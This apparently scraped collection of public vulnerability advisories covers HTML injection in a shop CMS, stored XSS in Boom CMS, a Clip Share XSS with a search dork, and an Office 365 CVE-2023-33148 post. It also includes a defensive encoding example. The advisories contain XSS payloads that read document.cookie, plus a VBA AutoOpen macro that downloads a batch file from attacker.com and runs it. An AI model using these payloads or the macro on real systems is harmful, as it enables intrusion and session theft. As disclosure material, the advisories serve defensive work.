Accountant"><img src="https://MALICIOUS-DOMAIN.com/gfx/logo-header.png">" id="demo-hor-1" class="form-control required"><br /></div></div><br /><div class="form-group"><br /><label class="col-sm-3 control-label" for="demo-hor-2">Email</label><br /><div class="col-sm-6"><br /><input type="email" name="email" value="accountant@shop.com" id="demo-hor-2" class="form-control required"><br /></div></div><br /><div class="form-group"><br /><label class="col-sm-3 control-label" for="demo-hor-3"><br />Phone</label><br /><div class="col-sm-6"><br /><input type="text" name="phone" value="017"><img src="https://MALICIOUS-DOMAIN.com/gfx/logo-header.png">" id="demo-hor-3" class="form-control"><br /></div></div><br /><br /><br />--- PoC Session Logs (POST) ---<br />https://assm_cms.localhost:8080/shop/admin/manage_admin/update_profile/<br />Host: assm_cms.localhost:8080<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0<br />Accept: text/html, */*; q=0.01<br />X-Requested-With: XMLHttpRequest<br />Content-Type: multipart/form-data; boundary=---------------------------280242453224137385302547344680<br />Content-Length: 902<br />Origin:https://assm_cms.localhost:8080<br />Connection: keep-alive<br />Referer:https://assm_cms.localhost:8080/shop/admin/manage_admin/<br />Cookie: ci_session=5n6fmo5q5gvik6i5hh2b72uonuem9av3; curr=1<br />-<br />POST: HTTP/3.0 200 OK<br />content-type: text/html; charset=UTF-8<br />ci_session=5n6fmo5q5gvik6i5hh2b72uonuem9av3; path=/; HttpOnly<br />https://assm_cms.localhost:8080/shop/admin/manage_admin/<br />Host: assm_cms.localhost:8080<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate, br<br />Connection: keep-alive<br /><br /><br />Reference(s):<br />https://assm_cms.localhost:8080/shop/<br 
/>https://assm_cms.localhost:8080/shop/admin/<br />https://assm_cms.localhost:8080/shop/admin/manage_admin/<br />https://assm_cms.localhost:8080/shop/admin/manage_admin/update_profile/<br /><br /><br />Solution - Fix & Patch:<br />=======================<br />Disallow insertion of HTML code in input fields like name, address and phone. Sanitize the content to deliver it securely.<br /><br /><br />Security Risk:<br />==============<br />The security risk of the HTML injection web vulnerabilities in the shopping web-application is estimated as medium.<br /><br /><br />Credits & Authors:<br />==================<br />Vulnerability-Lab [Research Team] - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab<br /><br /><br />Disclaimer & Information:<br />=========================<br />The information provided in this advisory is provided as is without any warranty. Vulnerability Lab disclaims all warranties,<br />either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab<br />or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits<br />or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do<br />not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.<br />We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.<br /><br />Domains: www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com<br /><br />Any modified copy or reproduction, including partial usage, of this file requires authorization from Vulnerability Laboratory.<br />Permission to electronically redistribute this alert in its unmodified form is granted. 
All other rights, including the use of other<br />media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other<br />information on this website are trademarks of the vulnerability-lab team & the specific authors or managers. To record, list, modify, use or<br />edit our material contact (admin@ or research@) to ask for permission.<br /><br /> Copyright © 2023 | Vulnerability Laboratory - [Evolution Security GmbH]™<br /><br /><br /><br />-- <br />VULNERABILITY LABORATORY (VULNERABILITY LAB)<br />RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE<br /><br /></code></pre>
<pre><code>Document Title:<br />===============<br />Boom CMS v8.0.7 - Cross Site Scripting Vulnerability<br /><br /><br />References (Source):<br />====================<br />https://www.vulnerability-lab.com/get_content.php?id=2274<br /><br /><br />Release Date:<br />=============<br />2023-07-03<br /><br /><br />Vulnerability Laboratory ID (VL-ID):<br />====================================<br />2274<br /><br /><br />Common Vulnerability Scoring System:<br />====================================<br />5.3<br /><br /><br />Vulnerability Class:<br />====================<br />Cross Site Scripting - Persistent<br /><br /><br />Current Estimated Price:<br />========================<br />500€ - 1.000€<br /><br /><br />Product & Service Introduction:<br />===============================<br />Boom is a fully featured, easy to use CMS. More than 10 years, and many versions later, Boom is an intuitive, WYSIWYG CMS that makes life<br />easy for content editors and website managers. Working with BoomCMS is simple. 
It's easy and quick to learn and start creating content.<br />It gives editors control but doesn't require any technical knowledge.<br /><br />(Copy of the Homepage: https://www.boomcms.net/boom-boom )<br /><br /><br />Abstract Advisory Information:<br />==============================<br />The vulnerability laboratory core research team discovered a persistent cross site scripting vulnerability in the Boom CMS v8.0.7 web-application.<br /><br /><br />Affected Product(s):<br />====================<br />UXB London<br />Product: Boom v8.0.7 - Content Management System (Web-Application)<br /><br /><br />Vulnerability Disclosure Timeline:<br />==================================<br />2022-07-24: Researcher Notification & Coordination (Security Researcher)<br />2022-07-25: Vendor Notification (Security Department)<br />2023-**-**: Vendor Response/Feedback (Security Department)<br />2023-**-**: Vendor Fix/Patch (Service Developer Team)<br />2023-**-**: Security Acknowledgements (Security Department)<br />2023-07-03: Public Disclosure (Vulnerability Laboratory)<br /><br /><br />Discovery Status:<br />=================<br />Published<br /><br /><br />Exploitation Technique:<br />=======================<br />Remote<br /><br /><br />Severity Level:<br />===============<br />Medium<br /><br /><br />Authentication Type:<br />====================<br />Restricted Authentication (User Privileges)<br /><br /><br />User Interaction:<br />=================<br />Low User Interaction<br /><br /><br />Disclosure Type:<br />================<br />Responsible Disclosure<br /><br /><br />Technical Details & Description:<br />================================<br />A persistent script code injection web vulnerability has been discovered in the official Boom CMS v8.0.7 web-application.<br />The vulnerability allows remote attackers to inject their own malicious script code with a persistent attack vector to compromise<br />browser to web-application requests from the application side.<br /><br />The vulnerability 
is located in the input fields of the album title and album description in the asset-manager module.<br />Attackers with low privileges are able to add their own malformed albums with malicious script code in the title and description.<br />After the injection the albums are displayed in the backend, where the execution takes place on preview of the main assets.<br />The attack vector of the vulnerability is persistent and the request method to inject is POST. The validation tries to escape<br />the content by prefixing a backslash. This has no effect on injected<br />JavaScript, because it is only performed for double and single quotes to prevent SQL injection.<br /><br />Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent<br />external redirects to malicious sources and persistent manipulation of affected application modules.<br /><br />Request Method(s):<br />[+] POST<br /><br />Vulnerable Module(s):<br />[+] assets-manager (album)<br /><br />Vulnerable Function(s):<br />[+] add<br /><br />Vulnerable Parameter(s):<br />[+] title<br />[+] description<br /><br />Affected Module(s):<br />[+] Frontend (Albums)<br />[+] Backend (Albums Assets)<br /><br /><br />Proof of Concept (PoC):<br />=======================<br />The persistent input validation web vulnerability can be exploited by remote attackers with a low privileged user account and with low user interaction.<br />For security demonstration or to reproduce the persistent cross site web vulnerability, follow the provided information and steps below to continue.<br /><br /><br />Manual steps to reproduce the vulnerability ...<br />1. Login to the application as restricted user<br />2. Create a new album<br />3. Inject a test script code payload to title and description<br />4. Save the request<br />5. Preview frontend (albums) and backend (assets-manager & albums listing) to provoke the execution<br />6. 
Successfully reproduced the persistent cross site web vulnerability!<br /><br /><br />Payload(s):<br />><script>alert(document.cookie)</script><div style=1<br /><a onmouseover=alert(document.cookie)>test</a><br /><br /><br />--- PoC Session Logs (Inject) ---<br />https://localhost:8000/boomcms/album/35<br />Host: localhost:8000<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0<br />Accept: application/json, text/javascript, */*; q=0.01<br />Content-Type: application/json<br />X-Requested-With: XMLHttpRequest<br />Content-Length: 263<br />Origin:https://localhost:8000<br />Connection: keep-alive<br />Referer:https://localhost:8000/boomcms/asset-manager/albums/[evil.source]<br />Sec-Fetch-Site: same-origin<br />{"asset_count":1,"id":35,"name":""><[INJECTED SCRIPT CODE PAYLOAD 1!]>","description":""><[INJECTED SCRIPT CODE PAYLOAD 2!]>",<br />"slug":"a","order":null,"site_id":1,"feature_image_id":401,"created_by":9,"deleted_by"<br />:null,"deleted_at":null,"created_at":"2021-xx-xx xx:x:x","updated_at":"2021-xx-xx xx:x:x"}<br />-<br />PUT: HTTP/1.1 200 OK<br />Server: Apache<br />Cache-Control: no-cache, private<br />Set-Cookie: Max-Age=7200; path=/<br />Cookie: laravel_session=eyJpdiI6ImVqSkTEJzQjlRPT0iLCJ2YWx1ZSI6IkxrdUZNWUF<br />VV1endrZk1TWkxxdnErTUFDY2pBS0JSYTVFakppRnNub1kwSkF6amQTYiLCJtY<br />yOTUyZTk3MjhlNzk1YWUzZWQ5NjNhNmRkZmNlMTk0NzQ5ZmQ2ZDAyZTED;<br />Max-Age=7200; path=/; httponly<br />Content-Length: 242<br />Connection: Keep-Alive<br />Content-Type: application/json<br />-<br />https://localhost:8000/boomcms/asset-manager/albums/[evil.source]<br />Host: localhost:8000<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br />Accept-Language: de,en-US;q=0.7,en;q=0.3<br />Accept-Encoding: gzip, deflate, br<br />Connection: keep-alive<br />Cookie: 
laravel_session=eyJpdiI6ImVqSkTEJzQjlRPT0iLCJ2YWx1ZSI6IkxrdUZNWUF<br />VV1endrZk1TWkxxdnErTUFDY2pBS0JSYTVFakppRnNub1kwSkF6amQTYiLCJtY<br />yOTUyZTk3MjhlNzk1YWUzZWQ5NjNhNmRkZmNlMTk0NzQ5ZmQ2ZDAyZTED;<br />-<br />GET: HTTP/1.1 200 OK<br />Server: Apache<br />Cache-Control: no-cache, private<br />Set-Cookie:<br />Vary: Accept-Encoding<br />Content-Length: 7866<br />Connection: Keep-Alive<br />Content-Type: text/html; charset=UTF-8<br />-<br /><br /><br />Vulnerable Source: asset-manager/albums/[ID]<br /><br /><li data-album="36"><br /> <a href="#albums/20"><br /> <div><br /> <h3>[MALICIOUS INJECTED SCRIPT CODE PAYLOAD 1!]</h3><br /> <p class="description">"><[MALICIOUS INJECTED SCRIPT CODE PAYLOAD 2!]></p><br /> <p class='count'><span>0</span> assets</p><br /> </div><br /> </a><br /> </li><br /></iframe></p></div></a></li></ul></div></div><br /> </div><br /><br /> <div id="b-assets-view-asset-container"></div><br /> <div id="b-assets-view-selection-container"></div><br /> <div id="b-assets-view-album-container"><div><div id="b-assets-view-album"><br /> <div class="heading"><br /> <h1 class="bigger b-editable" contenteditable="true"><[MALICIOUS INJECTED SCRIPT CODE PAYLOAD 1!]></h1><br /> <p class="description b-editable" contenteditable="true"><[MALICIOUS INJECTED SCRIPT CODE PAYLOAD 2!]></p><br /> </div><br /><br /><br />Solution - Fix & Patch:<br />=======================<br />The vulnerability can be patched by securely parsing and encoding the vulnerable title and description parameters.<br />Restrict the input fields and disallow the usage of special chars. 
Sanitize the output listing location to prevent further attacks.<br /><br /><br />Security Risk:<br />==============<br />The security risk of the persistent input validation web vulnerability in the application is estimated as medium.<br /><br /><br />Credits & Authors:<br />==================<br />Vulnerability-Lab [Research Team] - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab<br /><br /><br /> Copyright © 2023 | Vulnerability Laboratory - [Evolution Security GmbH]™<br /><br />-- <br />VULNERABILITY LABORATORY (VULNERABILITY LAB)<br />RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE<br /><br /></code></pre>
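As an added example (not code from either advisory, nor from the Active Super Shop or Boom CMS projects), the following JavaScript renders the two template fragments shown in the two advisories above, the profile form's name input and the album title heading, first with the quote-only backslash escaping the Boom CMS advisory describes and then with HTML entity encoding, feeding in the advisories' own payloads as constructed inputs; the template, helper and payload constant names are assumptions.

```javascript
// Added example, not code from the advisories or the affected CMSes.
// Contrasts quote-only backslash escaping (an anti-SQL-injection measure)
// with context-aware HTML output encoding on the advisories' own payloads.

// Escaping as the Boom CMS advisory describes it: only single and double
// quotes receive a backslash. Angle brackets and markup survive untouched.
function backslashQuotes(value) {
  return String(value).replace(/(["'])/g, "\\$1");
}

// Output encoding for HTML text and double-quoted attribute contexts.
// Encoding all five characters covers both contexts used by the affected pages.
function htmlEncode(value) {
  return String(value).replace(/[&<>"']/g, (ch) => ({
    "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;",
  }[ch]));
}

// Template fragments modelled on the two advisories (assumed helper names):
// a double-quoted value attribute on the profile form's name input, and the
// album title heading in the asset-manager listing. `encoder` is the function under test.
function renderProfileInput(name, encoder) {
  return `<input type="text" name="name" value="${encoder(name)}">`;
}
function renderAlbumTitle(title, encoder) {
  return `<h3>${encoder(title)}</h3>`;
}

// Rough indicator of context break-out: count start tags in the rendered
// fragment. The template itself emits exactly one, so anything above one
// means the user-supplied value was parsed as markup.
function countStartTags(html) {
  return (html.match(/<[a-zA-Z]/g) || []).length;
}

// Payloads quoted in the advisories (constructed test inputs, not live data).
const PROFILE_PAYLOAD =
  'Mr. Accountant"><img src="https://MALICIOUS-DOMAIN.com/gfx/logo-header.png">';
const ALBUM_PAYLOAD = '"><script>alert(document.cookie)</script><div style=1';

// Run both encoders over both templates and report the tag counts.
function demo() {
  const results = {};
  for (const [label, encoder] of [["backslash", backslashQuotes], ["htmlEncode", htmlEncode]]) {
    results[label] = {
      inputTags: countStartTags(renderProfileInput(PROFILE_PAYLOAD, encoder)),
      titleTags: countStartTags(renderAlbumTitle(ALBUM_PAYLOAD, encoder)),
    };
  }
  return results;
}

console.log(JSON.stringify(demo(), null, 2));
```

A backslash means nothing to an HTML parser, so the escaped quote still closes the attribute and the injected img and script tags are parsed; entity encoding keeps the value inside its intended context in both templates.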
<pre><code>## Title: Microsoft Office 365 Version 18.2305.1222.0 - Elevation of<br />Privilege Vulnerability + RCE.<br />## Author: nu11secur1ty<br />## Date: 07.18.2023<br />## Vendor: https://www.microsoft.com/<br />## Software: https://www.microsoft.com/en-us/microsoft-365/microsoft-office<br />## Reference: https://portswigger.net/web-security/access-control<br />## CVE-2023-33148<br /><br /><br />## Description:<br />The Microsoft Office 365 Version 18.2305.1222.0 app is vulnerable to<br />Elevation of Privilege.<br />The attacker can use this vulnerability to attach a very malicious<br />WORD file in the Outlook app which is a part of Microsoft Office 365<br />and can easily trick the victim into clicking on it, opening it and<br />executing a very dangerous shell command in the background of the<br />local PC. This execution happens without downloading this malicious file,<br />and this is a potential problem and a very dangerous case! This can be<br />the end of the victim's PC; it depends on the scenario.<br />WARNING! 
Office 365 executes files directly from Outlook, without temp<br />downloading, security checking, etc.<br /><br /><br />## Status: HIGH Vulnerability<br /><br />[+]Exploit:<br /><br />- - - NOTE:<br />This exploit is connected to a third-party server, and when the<br />victim clicks on it and opens it, the content of the script which is<br />inside will be fetched onto the machine locally and execute itself by using<br />the MS Office 365 and Outlook app which is a part of the 365 API.<br /><br />```vb<br />Sub AutoOpen()<br /> Call Shell("cmd.exe /S /c" & "curl -s<br />https://attacker.com/uqev/namaikitiputkata/golemui.bat > salaries.bat<br />&& .\salaries.bat", vbNormalFocus)<br />End Sub<br /><br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/Windows11Exploits/tree/main/2023/CVE-2023-33148)<br /><br />## Proof and Exploit<br />[href](https://www.nu11secur1ty.com/2023/07/cve-2023-33148.html)<br /><br />## Time spent:<br />00:35:00<br /><br /><br />-- <br />System Administrator - Infrastructure Engineer<br />Penetration Testing Engineer<br />Exploit developer at https://packetstormsecurity.com/<br />https://cve.mitre.org/index.html https://cxsecurity.com/ and<br />https://www.exploit-db.com/<br />0day Exploit DataBase https://0day.today/<br />home page: https://www.nu11secur1ty.com/<br />hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=<br /> nu11secur1ty <http://nu11secur1ty.com/><br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Clip Share 4.1.4 XSS Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(64-bit) |<br />| # Vendor : http://www.clip-share.com/ |<br />| # Dork : Powered By ClipShare |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or other search engines.<br /><br />[+] Xss :<br /><br /> This vulnerability affects /ClipShare/signup. <br /> URL encoded POST input username was set to xtqewoxj" onmouseover=prompt(993897) bad="<br /> The input is reflected inside a tag parameter between double quotes.<br /> URL encoded POST input email was set to sample%40email.tst" onmouseover=prompt(901680) bad="<br /> The input is reflected inside a tag parameter between double quotes.<br /><br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>